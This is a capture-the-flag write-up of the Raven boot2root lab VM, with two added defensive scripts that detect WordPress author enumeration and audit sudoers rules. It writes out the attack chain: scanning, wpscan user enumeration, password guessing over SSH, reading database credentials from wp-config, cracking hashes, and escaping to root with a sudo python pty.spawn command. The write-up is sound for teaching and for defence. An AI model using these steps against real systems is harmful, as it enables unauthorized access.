Raven Security

Description:

Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking.

As the description says, this is a boot2root machine aimed at beginners and intermediates. I started with the usual first step, a scan for the target's IP address:

┌──(root💀N4TR0)-[~]
└─# netdiscover -i vboxnet0
Currently scanning: 172.16.17.0/16   |   Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    08:00:27:7e:28:b0      1      42  PCS Systemtechnik GmbH
192.168.56.4    08:00:27:e6:5b:b8      1      60  PCS Systemtechnik GmbH

After getting the IP, I started an Nmap scan, which gives detailed information about the running services and their port numbers.

┌──(root💀N4TR0)-[~]
└─# nmap -v -p- -v -A 192.168.56.4

This showed four open ports: 22, 80, 111, and 36288.

Port 36288 is open on TCP, but browsing to it in a web browser returned nothing but an error page, so I moved on to port 80.

http://192.168.56.4/

Working through every page on the host and reading the page source, I found the first flag of the machine:

view-source:http://192.168.56.4/service.html
FLAG 1

Browsing the directories on the server showed that WordPress is running on the host.

Without wasting time, I looked for the login page and enumerated the users who can log in:

http://192.168.56.4/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.56.4%2Fwordpress%2Fwp-admin%2F&reauth=1
┌──(root💀N4TR0)-[~]
└─# wpscan --url http://192.168.56.4/wordpress -e -U /usr/share/wordlists/rockyou.txt


[i] User(s) Identified:

[+] steven
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] michael
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
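The "Author Id Brute Forcing" that wpscan reports above works by requesting /wordpress/?author=1, ?author=2, ... and reading the username WordPress leaks in the redirect. From the defender's side, that pattern is visible in the web server access log. The script below is an added example, not part of the original post; the Apache combined-format log lines are constructed for it, and the threshold of three distinct author IDs is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample log: one client walking author IDs 1..5 (a scanner),
# one client following a single author link (a normal visitor).
SAMPLE_LOG = """\
192.168.56.1 - - [22/Dec/2020:09:01:01 +0000] "GET /wordpress/?author=1 HTTP/1.1" 301 0
192.168.56.1 - - [22/Dec/2020:09:01:01 +0000] "GET /wordpress/?author=2 HTTP/1.1" 301 0
192.168.56.1 - - [22/Dec/2020:09:01:02 +0000] "GET /wordpress/?author=3 HTTP/1.1" 404 0
192.168.56.1 - - [22/Dec/2020:09:01:02 +0000] "GET /wordpress/?author=4 HTTP/1.1" 404 0
192.168.56.1 - - [22/Dec/2020:09:01:03 +0000] "GET /wordpress/?author=5 HTTP/1.1" 404 0
192.168.56.20 - - [22/Dec/2020:09:05:10 +0000] "GET /wordpress/?author=1 HTTP/1.1" 301 0
192.168.56.20 - - [22/Dec/2020:09:05:11 +0000] "GET /wordpress/index.php HTTP/1.1" 200 5120
"""

def author_probes(log_text):
    """Map client IP -> sorted list of distinct ?author= IDs it requested."""
    probes = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        query = parse_qs(urlsplit(m.group("path")).query)
        for value in query.get("author", []):
            if value.isdigit():
                probes[m.group("ip")].add(int(value))
    return {ip: sorted(ids) for ip, ids in probes.items()}

def flag_enumeration(log_text, threshold=3):
    """Return IPs that requested at least `threshold` distinct author IDs.
    A normal visitor follows one author link; a scanner walks 1, 2, 3, ..."""
    return {ip: ids for ip, ids in author_probes(log_text).items()
            if len(ids) >= threshold}

if __name__ == "__main__":
    for ip, ids in flag_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: probed author IDs {ids}")
```

The 301 responses for IDs 1 and 2 match the two real accounts (michael and steven) while the 404s mark IDs that do not exist, which is exactly the signal wpscan used.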

I tried to log in to WordPress with both usernames, also using each username as its own password, without success. Trying the same on the SSH service worked for the user “michael”.

"michael:michael"

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# ssh michael@192.168.56.4
michael@192.168.56.4's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Tue Dec 22 09:03:34 2020 from 192.168.56.1
michael@Raven:~$

After spending some time checking the directories a normal user can access, I found nothing until I went into “/var/www/”, where the next flag of the machine was waiting:

michael@Raven:/var/www$ cat flag2.txt 
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

With the second flag in hand, I started looking for a way to get root. Several attempts failed, so I turned to the configuration files readable by the user “michael” and found the database credentials in the wp-config.php file, which gave me access to the “MySQL” service.

root : R@v3nSecurity

michael@Raven:/var/www/html/wordpress$ mysql -u root -p

With access to the MySQL database, I obtained the password hash of the other user, “steven”:

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)

Cracking the hash with John the Ripper gave me the password for the user steven:

Steven : pink84

michael@Raven:/var/www/html/wordpress$ su steven
Password:

Checking whether the user has any permissions that lead to root access, I found one on the first try:

$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python

So the hole that gets me root is “sudo” without a password on the python binary. Without wasting time, I used sudo python to spawn a bash shell:

$ sudo python -c 'import pty;pty.spawn("/bin/bash");'
root@Raven:/var/www/html/wordpress#
root@Raven:/var/www/html/wordpress# id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/var/www/html/wordpress# whoami
root
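The sudo -l entry above is the kind of rule a sudoers audit should catch: any command that is itself an interpreter or shell hands the caller a root shell, and NOPASSWD removes the last prompt. The script below is an added example, not from the post; the sudoers excerpt is constructed (the steven rule mirrors the output shown above, the others are made up for contrast) and the list of shell-capable binaries is an illustrative assumption.

```python
import os
import re

# Interpreters and shells that can start an interactive shell when run
# under sudo (as /usr/bin/python does on Raven). Illustrative, not exhaustive.
SHELL_CAPABLE = {
    "python", "python2", "python3", "perl", "ruby", "php", "node",
    "bash", "sh", "dash", "zsh",
}

# One sudoers entry: user host=(runas) [TAG:]... cmd1, cmd2, ...
RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:(?:NOPASSWD|PASSWD|SETENV|NOEXEC):\s*)*)(?P<cmds>.+)$'
)

# Constructed sudoers excerpt for the example.
SAMPLE_SUDOERS = """\
# User privilege specification
steven  ALL=(ALL) NOPASSWD: /usr/bin/python
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/python3
deploy  ALL=(www-data) /usr/bin/systemctl restart apache2
"""

def audit_sudoers(text):
    """Return (user, runas, command, reason) for rules that hand out a shell."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            if cmd == "ALL":
                reason = "unrestricted command set"
            elif os.path.basename(cmd.split()[0]) in SHELL_CAPABLE:
                reason = "interpreter/shell-capable binary"
            else:
                continue  # e.g. rsync or systemctl with fixed arguments
            if nopasswd:
                reason += ", NOPASSWD"
            findings.append((m.group("user"), m.group("runas"), cmd, reason))
    return findings

if __name__ == "__main__":
    for user, runas, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user} -> ({runas}) {cmd}: {reason}")
```

The fix for the steven rule is not a password prompt but removing the interpreter from sudoers entirely, or restricting it to a specific script with NOEXEC.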

And finally I got the final flag of the machine:

Final Flag

In all this I had not yet found the third flag of the machine, so I went back for it and finally found it in the blog posts table, “wp_posts”:

$  select * from wp_posts;
Third Flag

Enjoyed a lot while rooting the machine. Thanks @William McCann for the machine.

Hope you read and like it.

🤣🤣🤣🤣🤣🤣🤣
